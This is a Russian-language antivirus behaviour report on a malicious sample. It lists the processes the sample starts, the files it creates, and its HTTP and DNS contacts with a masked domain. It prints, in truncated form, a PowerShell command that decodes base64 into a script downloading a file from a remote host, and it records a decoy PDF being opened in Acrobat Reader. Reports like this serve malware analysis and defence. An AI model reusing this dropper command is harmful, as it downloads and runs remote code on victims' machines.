Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c $text=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHA9JGVudjpBUFBEQVRBDQooTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCJodHRwOi8vc3BleS5jb20vc...
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "<Текущая директория>\2.pdf"
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\1.pdf"
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\1.pdf
- <Текущая директория>\2.pdf
- %LOCALAPPDATA%\adobe\color\profiles\wscrgb.icc
- %LOCALAPPDATA%\adobe\color\profiles\wsrgb.icc
- %LOCALAPPDATA%\adobe\color\acecache11.lst
Сетевая активность
Подключается к
- 'sp##.com':80
TCP
Запросы HTTP GET
- http://sp##.com/schoolcalendar.pdf
UDP
- DNS ASK sp##.com
Другое
Ищет следующие окна
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /k %output% -c $text=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHA9JGVudjpBUFBEQVRBDQooTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCJodHRwOi8vc...
